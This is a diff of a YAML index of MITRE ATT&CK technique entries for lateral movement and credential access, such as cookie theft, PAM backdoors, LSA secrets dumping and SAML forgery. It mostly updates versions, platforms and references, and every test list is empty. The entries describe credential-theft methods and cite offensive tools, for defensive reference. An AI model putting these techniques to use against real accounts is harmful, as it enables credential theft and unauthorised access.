-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -43148,12 +43819,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -43177,11 +43847,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -43206,9 +43875,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -43268,7 +43936,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -43323,7 +43990,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -43391,12 +44057,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -43453,6 +44118,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43463,13 +44129,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -43528,7 +44193,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -43622,49 +44286,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -43679,20 +44304,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -43772,12 +44434,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43806,6 +44467,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -43817,18 +44479,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -43855,14 +44517,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests: []
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43986,12 +44645,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -44006,10 +44664,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -44017,14 +44676,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -44067,14 +44726,11 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests: []
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -44129,14 +44785,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -44187,14 +44842,13 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests: []
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -44228,8 +44882,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -44246,11 +44900,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -44268,7 +44921,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -44285,10 +44938,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -44312,46 +44965,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -44372,65 +44991,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -44439,6 +45055,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44446,31 +45065,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
